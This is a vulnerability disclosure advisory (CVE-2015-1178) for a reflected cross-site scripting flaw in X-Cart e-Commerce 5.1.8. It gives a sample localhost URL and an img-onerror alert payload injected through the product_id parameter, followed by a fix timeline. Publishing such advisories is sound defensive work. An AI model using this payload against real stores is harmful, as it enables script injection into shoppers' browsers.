X-CART e-Commerce 5.1.8 Cross Site Scripting

`CVE-2015-1178-xss-x-cart-ecommerce  
  
  
Information  
----------------  
Advisory by Octogence.  
Name: Reflected XSS Vulnerability in X-CART e-Commerce software  
Affected Software : X-Cart  
Affected Versions: 5.1.8 and possibly below  
Vendor Homepage : https://www.x-cart.com  
Vulnerability Type : Cross-site Scripting  
Severity : High  
CVE ID: CVE-2015-1178  
  
Impact  
----------  
An attacker can craft a URL with malicious JavaScript code which  
executes in the browser.  
  
Technical Details  
-------------------------  
Sample URL:  
  
http://localhost/xcart/cart.php?target=product&product_id=4096cce–%3E%3Cimg%20src%3da%20onerror%3dalert%281%29%3Ebd85f&category_id=1  
  
Parameters:  
product_id  
category_id  
  
Sample Payload:  
<img src=a onerror=alert(1)>  
  
For more information on cross-site scripting vulnerabilities read the  
following article:  
  
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)  
  
Advisory Timeline (mm/dd/yyyy)  
----------------------------------------------  
11/19/2014 – Reported  
12/04/2014 – Vulnerability Fixed  
01/22/2015 – Advisory Released  
  
  
--   
Regards  
Sudhanshu  
  
Octogence Tech Solutions  
Noida, India  
Mobile | +91-9971658929  
Website| www.octogence.com  
`